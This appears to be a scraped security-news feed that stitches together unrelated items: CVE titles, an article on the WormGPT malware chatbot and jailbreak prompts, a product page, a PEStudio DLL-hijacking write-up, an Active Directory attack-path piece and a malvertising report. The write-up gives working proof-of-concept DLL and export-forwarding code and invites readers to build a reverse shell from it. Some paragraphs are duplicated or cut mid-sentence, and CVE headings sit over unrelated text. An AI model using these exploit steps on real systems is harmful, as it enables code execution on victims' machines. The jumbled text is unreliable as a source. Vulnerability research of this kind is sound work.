Microsoft Message Queuing Information Disclosure Vulnerability

CVE-2023-36913

Microsoft Message Queuing Denial of Service Vulnerability

CVE-2023-38254

CVE-2023-35377

CVE-2023-38172

WormGPT, a private new chatbot service advertised as a way to use Artificial Intelligence (AI) to help write malicious software without all the pesky prohibitions on such activity enforced by ChatGPT and Google Bard, has started adding restrictions on how the service can be used. Faced with customers trying to use WormGPT to create ransomware and phishing scams, the 23-year-old Portuguese programmer who created the project now says his service is slowly morphing into “a more controlled environment.”

The large language models (LLMs) made by ChatGPT parent OpenAI or Google or Microsoft all have various safety measures designed to prevent people from abusing them for nefarious purposes — such as creating malware or hate speech. In contrast, WormGPT has promoted itself as a new LLM that was created specifically for cybercrime activities.

**WormGPT**, a private new chatbot service advertised as a way to use Artificial Intelligence (AI) to write malicious software without all the pesky prohibitions on such activity enforced by the likes of **ChatGPT** and **Google Bard**, has started adding restrictions of its own on how the service can be used. Faced with customers trying to use WormGPT to create ransomware and phishing scams, the 23-year-old Portuguese programmer who created the project now says his service is slowly morphing into “a more controlled environment.”

Image: SlashNext.com.

The large language models (LLMs) made by ChatGPT parent **OpenAI** or **Google** or **Microsoft** all have various safety measures designed to prevent people from abusing them for nefarious purposes — such as creating malware or hate speech. In contrast, WormGPT has promoted itself as a new, uncensored LLM that was created specifically for cybercrime activities.

WormGPT was initially sold exclusively on **HackForums**, a sprawling, English-language community that has long featured a bustling marketplace for cybercrime tools and services. WormGPT licenses are sold for prices ranging from 500 to 5,000 Euro.

“Introducing my newest creation, ‘WormGPT,’ wrote “**Last**,” the handle chosen by the HackForums user who is selling the service. “This project aims to provide an alternative to ChatGPT, one that lets you do all sorts of illegal stuff and easily sell it online in the future. Everything blackhat related that you can think of can be done with WormGPT, allowing anyone access to malicious activity without ever leaving the comfort of their home.”

WormGPT’s core developer and frontman “Last” promoting the service on HackForums. Image: SlashNext.

In July, an AI-based security firm called **SlashNext** analyzed WormGPT and asked it to create a “business email compromise” (BEC) phishing lure that could be used to trick employees into paying a fake invoice.

“The results were unsettling,” SlashNext’s **Daniel Kelley** wrote. “WormGPT produced an email that was not only remarkably persuasive but also strategically cunning, showcasing its potential for sophisticated phishing and BEC attacks.”

SlashNext asked WormGPT to compose this BEC phishing email. Image: SlashNext.

A review of Last’s posts on HackForums over the years shows this individual has extensive experience creating and using malicious software. In August 2022, Last posted a sales thread for “**Arctic Stealer**,” a data stealing trojan and keystroke logger that he sold there for many months.

“I’m very experienced with malwares,” Last wrote in a message to another HackForums user last year.

Last has also sold a modified version of the information stealer **DCRat**, as well as an obfuscation service marketed to malicious coders who sell their creations and wish to insulate them from being modified or copied by customers.

Shortly after joining the forum in early 2021, Last told several different Hackforums users his name was Rafael and that he was from Portugal. HackForums has a feature that allows anyone willing to take the time to dig through a user’s postings to learn when and if that user was previously tied to another account.

That account tracing feature reveals that while Last has used many pseudonyms over the years, he originally used the nickname “**ruiunashackers**.” The first search result in Google for that unique nickname brings up a **TikTok** account with the same moniker, and that TikTok account says it is associated with an **Instagram** account for a **Rafael Morais** from Porto, a coastal city in northwest Portugal.

**AN OPEN BOOK**

Reached via Instagram and Telegram, Morais said he was happy to chat about WormGPT.

“You can ask me anything,” Morais said. “I’m an open book.”

Morais said he recently graduated from a polytechnic institute in Portugal, where he earned a degree in information technology. He said only about 30 to 35 percent of the work on WormGPT was his, and that other coders are contributing to the project. So far, he says, roughly 200 customers have paid to use the service.

“I don’t do this for money,” Morais explained. “It was basically a project I thought \[was\] interesting at the beginning and now I’m maintaining it just to help \[the\] community. We have updated a lot since the release, our model is now 5 or 6 times better in terms of learning and answer accuracy.”

WormGPT isn’t the only rogue ChatGPT clone advertised as friendly to malware writers and cybercriminals. According to SlashNext, one unsettling trend on the cybercrime forums is evident in discussion threads offering “jailbreaks” for interfaces like ChatGPT.

“These ‘jailbreaks’ are specialised prompts that are becoming increasingly common,” Kelley wrote. “They refer to carefully crafted inputs designed to manipulate interfaces like ChatGPT into generating output that might involve disclosing sensitive information, producing inappropriate content, or even executing harmful code. The proliferation of such practices underscores the rising challenges in maintaining AI security in the face of determined cybercriminals.”

Morais said they have been using the GPT-J 6B model since the service was launched, although he declined to discuss the source of the LLMs that power WormGPT. But he said the data set that informs WormGPT is enormous.

“Anyone that tests wormgpt can see that it has no difference from any other uncensored AI or even chatgpt with jailbreaks,” Morais explained. “The game changer is that our dataset \[library\] is big.”

Morais said he began working on computers at age 13, and soon started exploring security vulnerabilities and the possibility of making a living by finding and reporting them to software vendors.

“My story began in 2013 with some greyhat activies, never anything blackhat tho, mostly bugbounty,” he said. “In 2015, my love for coding started, learning c# and more .net programming languages. In 2017 I’ve started using many hacking forums because I have had some problems home (in terms of money) so I had to help my parents with money… started selling a few products (not blackhat yet) and in 2019 I started turning blackhat. Until a few months ago I was still selling blackhat products but now with wormgpt I see a bright future and have decided to start my transition into whitehat again.”

WormGPT sells licenses via a dedicated channel on Telegram, and the channel recently lamented that media coverage of WormGPT so far has painted the service in an unfairly negative light.

“We are uncensored, not blackhat!” the WormGPT channel announced at the end of July. “From the beginning, the media has portrayed us as a malicious LLM (Language Model), when all we did was use the name ‘blackhatgpt’ for our Telegram channel as a meme. We encourage researchers to test our tool and provide feedback to determine if it is as bad as the media is portraying it to the world.”

It turns out, when you advertise an online service for doing bad things, people tend to show up with the intention of doing bad things with it. WormGPT’s front man Last seems to have acknowledged this at the service’s initial launch, which included the disclaimer, “We are not responsible if you use this tool for doing bad stuff.”

But lately, Morais said, WormGPT has been forced to add certain guardrails of its own.

“We have prohibited some subjects on WormGPT itself,” Morais said. “Anything related to murders, drug traffic, kidnapping, child porn, ransomwares, financial crime. We are working on blocking BEC too, at the moment it is still possible but most of the times it will be incomplete because we already added some limitations. Our plan is to have WormGPT marked as an uncensored AI, not blackhat. In the last weeks we have been blocking some subjects from being discussed on WormGPT.”

Still, Last has continued to state on HackForums — and more recently on the far more serious cybercrime forum **Exploit** — that WormGPT will quite happily create malware capable of infecting a computer and going “fully undetectable” (FUD) by virtually all of the major antivirus makers (AVs).

“You can easily buy WormGPT and ask it for a Rust malware script and it will 99% sure be FUD against most AVs,” Last told a forum denizen in late July.

Asked to list some of the legitimate or what he called “white hat” uses for WormGPT, Morais said his service offers reliable code, unlimited characters, and accurate, quick answers.

“We used WormGPT to fix some issues on our website related to possible sql problems and exploits,” he explained. “You can use WormGPT to create firewalls, manage iptables, analyze network, code blockers, math, anything.”

Morais said he wants WormGPT to become a positive influence on the security community, not a destructive one, and that he’s actively trying to steer the project in that direction. The original HackForums thread pimping WormGPT as a malware writer’s best friend has since been deleted, and the service is now advertised as “WormGPT – Best GPT Alternative Without Limits — Privacy Focused.”

“We have a few researchers using our wormgpt for whitehat stuff, that’s our main focus now, turning wormgpt into a good thing to \[the\] community,” he said.

It’s unclear yet whether Last’s customers share that view.

Meet the Brains Behind the Malware-Friendly AI Chat Service ‘WormGPT’

An issue in the CAB file extraction function of Bitberry File Opener v23.0 allows attackers to execute a directory traversal.

*   Contact

Quality software for Windows since 2000

**Bitberry File Opener**

Our popular file viewer, which was first released in 2010, is used by hundreds of thousands of happy users to view and play a large variety of file types, including documents, spreadsheets, images, videos and audio files.

The second generation, released in 2021 and renamed Bitberry File Opener, is a major update that supports the **opening of 410 file types**. It adds support for advanced image editing, archive- and compressed file extraction, as well as opening and editing of Microsoft Word documents and Microsoft Excel spreadsheets without having Microsoft Office installed.

More information

**Photo Handler**

Photo Handler is our photo management software. Import photos from your camera, convert and resize, add effects and watermarks, batch process photos and much more.

More information

**BitZipper**

BitZipper, our first product initially released way back in year 2000, enables you to open 47 different compressed and encoded file formats with superior ease of use. It contains a powerful built-in file previewer, so you can preview files before decompressing them.

More information

**Final Media Player**

Final Media Player is a media player that supports more than 80 types of audio and video files. Everything needed is included in the setup program. No obscure codecs needed. Just install and play your files.

More information

**Get in touch!**

Contact us to get a quote for a multi-user business license, to get product support, to discuss business opportunities - or to just say hi :-)

CVE-2023-37646: Bitberry Software produces a growing range of products for Windows PCs, and has been doing so since 2000

An issue in PEStudio v.9.52 allows a remote attacker to execute arbitrary code via a crafted DLL file to the PESstudio exeutable.

Lately, I have reported multiple DLL Hijacking vulnerabilities. These are quite straightforward, yet quite impactful. Thus, I thought of sharing some theory as well as a practical example of DLL Hijacking (how exciting, right?). This is YADHA (Yet Another DLL Hijacking Article)!

1.  DLL Hijacking Theory
    1.  Let’s Look at the Win32 API LoadLibraryA Function
2.  How to Find DLL Hijacking Vulnerabilities?
3.  Creating the Exploit
4.  Impact

**DLL Hijacking Theory**

In the simplest terms, DLL Hijacking, also known as DLL side-loading, is an attack that exploits the way Windows searches for and loads DLL files, allowing an attacker to replace a legitimate DLL with a malicious one, leading to unauthorized code execution. This can happen due to various reasons, such as:

*   Incorrect DLL search order: Windows searches for DLLs in specific locations, such as the current directory or system folders. If an application does not specify the DLL’s full path, an attacker can place a malicious DLL in a directory with higher search priority, leading to the hijacking.

*   Weak or missing DLL loading safeguards: Applications may not implement sufficient security measures to validate the integrity and authenticity of DLL files, making them susceptible to substitution by malicious counterparts.

**Let’s Look at the Win32 API LoadLibraryA Function**

LoadLibraryA loads the specified module into the address space of the calling process. The specified module may cause other modules to be loaded (see https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya).

The screenshot above, highlights the essence of the issue by noting that if the string specifies a full path, the function searches only that path for the module, however, if the string specifies a relative path or a module name without a path, the function uses a standard search strategy to find the module. This is interesting, because it highlights a neat fix to the DLL Hijacking issue – specifying full paths to the modules.

This article (https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security) gives us some more insight into the load order. Assuming safe DLL search mode is enabled and the application is not using an alternate search order, the system searches directories in the following order:

1.  The directory from which the application loaded.
2.  The system directory.
3.  The 16-bit system directory.
4.  The Windows directory.
5.  The current directory.
6.  The directories that are listed in the PATH environment variable.

In other words, if the DLL is located in the directory form which the application is loaded, the application will stop searching the other directories for the module. Thus, if we can write to the search directories, we can manipulate the DLLs which are loaded.

**How to Find DLL Hijacking Vulnerabilities?**

Feel free to follow along with this section!

Let’s take the example of PEStudio 9.52. We can download PEStudio 9.52 from the following link: https://www.winitor.com/download2. In order to find DLL Hijacking vulnerabilities, we will need Procmon – a fantastic utility which is part of Microsoft’s SysInternals Suite (https://download.sysinternals.com/files/SysinternalsSuite.zip).

With our vulnerable application (PEStudio 9.52) and our tools (SysInternals Suite) downloaded, we are ready to start! The first step is to run Procmon64.exe and set the following filters:

We are looking for DLLs which are attempted to be loaded by pestudio.exe and are not found. Now that we started capturing using the filters above, we can start PEStudio. It isn’t long before we get the following results in Procmon:

This indicates that the 6 DLLs are attempted to be loaded from the directory from which the application is loaded. Let’s take sensapi.dll as an example for further inspection – by changing the _Path ends with_ filter from “.dll” to “sensapi.dll”. We now find that pestudio.exe tries to load sensapi.dll from the directory from which the application is loaded, fails, and then loads it from System32.

Thus, if we are able to write our own malicious version of sensapi.dll into the pestudio folder, we may be able to run arbitrary commands on the system.

**Creating the Exploit**

Let’s take the following Proof of Concept C code (dll\_hijack.c):

    #include <windows.h>
    #pragma comment (lib, "user32.lib")
    
    BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
        switch (ul_reason_for_call)  {
        case DLL_PROCESS_ATTACH:
          MessageBox(
            NULL,
            "DLL Hijack!",
            "PoC",
            MB_OK
          );
          break;
        case DLL_PROCESS_DETACH:
          break;
        case DLL_THREAD_ATTACH:
          break;
        case DLL_THREAD_DETACH:
          break;
        }
        return TRUE;
    }

This piece of code should generate a message box. Of course, this is a benign PoC, however, the potential for malicious code is only limited by the attacker’s imagination.

Let’s also create the following Python script (dll\_def.py):

    import pefile
    import sys
    import os.path
    
    dll = pefile.PE(sys.argv[1])
    dll_basename = os.path.splitext(sys.argv[1])[0]
    
    try:
        with open(sys.argv[1].split("/")[-1].replace(".dll", ".def"), "w") as f:
            f.write("EXPORTS\n")
            for export in dll.DIRECTORY_ENTRY_EXPORT.symbols:
                if export.name:
                    f.write('{}={}.{} @{}\n'.format(export.name.decode(), dll_basename, export.name.decode(), export.ordinal))
    except:
        print ("Failed to create .def file :(")
    else:
        print ("Successfully created .def file :)")

The Python script was inspired by https://cocomelonc.github.io/pentest/2021/10/12/dll-hijacking-2.html. The script enumerates the exported functions from a DLL. The reason for this will soon become clear.

We must first find the original DLL and transfer it to our attack box.

Then, we must find the functions exported by the initial DLL and create a .def file using the Python scrip shared above. We must use this .def file when compiling our C PoC, because otherwise there is a chance that our DLL will not be loaded due to missing procedures or entry points. After cross compiling the DLL (we are creating a Windows-specific file on a Linux system), we must transfer the resulting DLL onto the Windows system.

We then place poc.dll into the same folder as pestudio.exe and rename it to sensapi.dll. Now, when we run pestudio.exe, we see that our DLL was loaded and generated a message box. Once we click OK, pestudio runs normally.

**Impact**

Generally speaking, DLL Hijacking can allow attackers to run arbitrary commands on the victim’s system. In some cases, DLL Hijacking is used for privilege escalation, however, this is not the case for PEStudio, because I don’t see any reason to run PEStudio as admin. Nevertheless, application developers should take security into account and provide full paths to loaded modules in order to avoid these types of attacks. I encourage you to try to exploit this vulnerability in PEStudio to cause a reverse shell or create a user, but also to try to find these types of vulnerabilities in other applications, as I get the sense that there are a lot more of them than reported.

CVE-2023-36546: DLL Hijacking – Finding CVE-2023-36546 in PEStudio 9.52

Introduced in 1999, Microsoft Active Directory is the default identity and access management service in Windows networks, responsible for assigning and enforcing security policies for all network endpoints. With it, users can access various resources across networks. As things tend to do, times, they are a'changin' – and a few years back, Microsoft introduced Azure Active Directory, the

Introduced in 1999, Microsoft Active Directory is the default identity and access management service in Windows networks, responsible for assigning and enforcing security policies for all network endpoints. With it, users can access various resources across networks. As things tend to do, times, they are a'changin' – and a few years back, Microsoft introduced Azure Active Directory, the cloud-based version of AD to extend the AD paradigm, providing organizations with an Identity-as-a-Service (IDaaS) solution across both the cloud and on-prem apps. (Note that as of July 11th 2023, this service was renamed to _Microsoft Entra ID_, but for the sake of simplicity, we'll refer to it as Azure AD in this post)

Both Active Directory and Azure AD are critical to the functioning of on-prem, cloud-based, and hybrid ecosystems, playing a key role in uptime and business continuity. And with 90% of organizations using the service for employee authentication, access control and ID management, it has become the keys to the proverbial castle.

**Active Directory, Actively Problematic**

But as central as it is, Active Directory security posture is often woefully lacking.

Let's take a quick peek at how Active Directory assigns users, which will shed some light on why this tool has some shall we say, issues, associated with it.

At the core, what Active Directory does is establish groups that have roles and authorizations associated with them. Users are assigned a username and password, which is then linked to their Active Directory Account Object. Using Lightweight Directory Access Protocol, passwords are verified as correct or incorrect and the usergroup is also verified. In general, users are assigned to the Domain User group and will be granted access to the objects that domain users have authorization to access. Then there are Admins – these are users assigned to the Domain Admins group. This group is highly privileged and is thus authorized to perform any actions in the network.

With such potentially potent capabilities, it's super critical to ensure that Active Directory is managed and configured optimally. Issues like missed patches, poor access management and misconfigurations can allow attackers to access even the most sensitive systems, which can have dire consequences.

In 2022, our in-house research found that 73% of the top attack techniques used in the compromising of critical assets involved mismanaged or stolen credentials – and more than half of the attacks in organizations include some element of Active Directory compromise. And once they have a foothold in Active Directory, attackers can perform loads of different malicious actions like:

*   Hiding activity in the network
*   Executing malicious code
*   Elevating privileges
*   Getting into the cloud environment to compromise critical assets

Point is, if you don't know what's happening in your Active Directory, and if you're lacking the proper processes and security controls, you're likely leaving the door wide open to attackers.

**Download our latest research report, and discover**

*   How many steps it takes for attackers to typically compromise your critical assets
*   Top exposures and hygiene issues that form attack paths
*   Key findings related to attacks across hybrid, on-prem or multi-cloud networks.

**Active Directory Attack Paths**

From an attacker's POV, Active Directory serves as a great opportunity for conducting lateral movement, as gaining that initial access allows them to move from a low-privileged user to a more valuable target – or even to fully take over – by exploiting misconfigurations or overly excessive permissions.

So now let's take a look into the anatomy of 3 actual Active Directory attack paths and see how attackers made their way through this environment.

Here is an attack path we came across in one of our customer's environment:

The organization was deeply committed to hardening their security posture but Active Directory was a blind spot. In this case, all authenticated users – essentially any users at all – in the domain had been accidentally granted the right to reset passwords. So if an attacker took over one Active Directory user via phishing or other social engineering techniques, they could then reset any passwords for other users and take over any account in the domain.Once they saw this, they finally understood their Active Directory security approach needed to level-up so they locked down and hardened their security practices.

Here's another one from one of our customer's Active Directory;

We uncovered an attack path using the authenticated users group with permissions to change the GPO policy's gPCFileSysPath to a path with malicious policies.

One of the affected objects was the AD User Container, with a child object that was a user which was part of the Domain Admin group. Any user in the domain could get Domain Admin permissions -- all they needed was one non-privileged user to fall prey to a phishing email to compromise the entire domain. This could have led to a complete compromise of their domain.

Ready for one more? Here it is:

This one starts with an attacker infiltrating an enterprise environment via phishing mail that when opened, executed code using a vulnerability on an unpatched machine. The next step exploited the compromised Active Directory user's local and domain credentials through credential dumping techniques. The attacker then had the permissions to add themselves to a group so they could add the compromised Active Directory user to an Active Directory helpdesk group.

The helpdesk group had the Active Directory permissions to reset other users passwords and at this stage, the attacker could reset a password to another user, preferably an old, out of use admin. Now that they were an admin, they could perform lots of harmful activities in the network, such as running malicious code by adding a script logon to other users in Active Directory.

These are just some relatively simple ways attackers make their way across Active Directory environments. By understanding these actual real-world attack paths, organizations can start to see what their Active Directory and AD Azure environments look like from the attacker's point of view.

**Watch on-demand How To Overcome Active Directory Exploits And Prevent Attacks to learn:**

*   How Active Directory (AD) exposures combined with other attack techniques form attack paths
*   What kind of actions the attacker can perform once they compromise an AD user
*   What to do for better Active Directory Security

**Conclusion**

Looking at attack paths can help shore up these potentially tricky environments. By getting a comprehensive view of the attack paths that exist in Active Directory across on-prem and cloud environments, organizations can learn how attackers move laterally with a context-based understanding of their environment – giving them visibility into how issues can combine to facilitate attacks and impersonate users, escalate privileges, and gain access to cloud environments.

With this understanding, organizations can prioritize what really needs fixing and harden environments to prevent Active Directory weaknesses from being leveraged by threat actors.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Understanding Active Directory Attack Paths to Improve Security

In MongoDB Ops Manager v5.0 prior to 5.0.22 and v6.0 prior to 6.0.17 it is possible for an authenticated user with project owner or project user admin access to generate an API key with the privileges of org owner resulting in privilege escalation.


CVE-2023-4009: Ops Manager Server Changelog — MongoDB Ops Manager 5.0

Categories: Threat Intelligence
Tags: malvertising

Tags: nft

Tags: crypto

Tags: wallet

Tags: bing

Tags: google

NFT enthusiasts are getting their wallets drained after clicking on a malicious ad.



(Read more...)




The post Digital assets continue to be prime target for malvertisers appeared first on Malwarebytes Labs.

Cyber-criminals continue to impersonate brands via well-crafted phishing websites. We previously covered attacks on both consumers and businesses via online searches for popular brands leading to scams or malware.

Digital assets such as cryptocurrencies or NFTs are highly coveted by threat actors due to the high gains that can be made, even via a simple phishing attack.

In this blog post, we investigate a malicious ad on Microsoft Bing for LooksRare, an NFT marketplace. Malvertising is helping scammers to phish users with added credibility but also leaves victims irate about ads and top search engines.

**Malicious ads for NFT marketplace**

Non-fungible tokens (NFTs) are assets that have been tokenized via a blockchain. Whether you are into them or find them laughable, a lot of money is being invested, making them attractive to criminals. In a post on social media, one user claimed to have lost $300K worth of NFTs because they clicked on a Google ad:

We could not immediately find the same ad on Google, but we did see one on Microsoft Bing that is likely tied to the same campaign:

The "why you're seeing this ad?" dialog shows the advertiser as being from China and the ad by a company named Fantacy Click Limited:

Microsoft's Advertiser Identity Verification Program states that when ads don't pass policy checks, they either stop serving the ads or suspend the advertiser's account. In this example of brand impersonation, the phishing domain (looksrare-org\[.\]com) was freshly registered on August 7th 2023. While we can't expect companies to track every possible brand out there, a simple domain registration check could easily reveal risky advertisers.

**Decoy redirect**

The threat actor invested minim efforts to deceive crawlers and other automation tools by setting up the usual cloaking page. In this example, you get redirected to an "about us" decoy page:

Unfortunately, while it is easy for humans to see that this site is completely fake, machines will find no security issue and validate it:

**Redirect and phishing page**

Legitimate users and intended victims clicking on the ad will get a different experience. They are redirected to a second website (www-market-lookshare\[.\]com) that was also registered very recently and that acts as the phishing site:

This site is a close replica of the official looksrare\[.\]org domain:

**Draining wallets**

The phishing site invites victims to connect their wallet by scanning a QR code:

If you are running the Coinbase extension, you will get a request such as the one below:

After connecting to the victim's wallet, the threat actor will run a few queries and eventually prompt the user to sign a message, granting them access to their NFTs. Someone has analyzed the transactions associated with this campaign in a thread here.

**Phishing and crypto assets**

Many people have expressed concerns about cryptocurrencies and other digital assets due to how many scams there are, but also because of how easy it can be to lose very large sums of money with just a few wrong clicks.

Phishing sites can be very convincing especially if the user visited them via a paid Google or Bing search ad that they expect has already been verified as legitimate.

There are a number of tools that can help to protect your wallets and gain better visibility over incoming transactions. Malwarebytes Browser Guard can block those phishing websites and malicious ads to keep you out of harm's way.

We have reported this malicious ad to Microsoft via their low quality ad submission & escalation form. An automated response informed us that Microsoft will review and take action on any ads found to be in violation within 3-5 days. Unfortunately, this gives criminals enough time to run their malvertising campaigns uninterrupted and switch accounts by the time they are caught.

**Indicators of compromise**

looksrare-org\[.\]info  
looksrare-org\[.\]com  
www-market-looksrare\[.\]com

Tag

#microsoft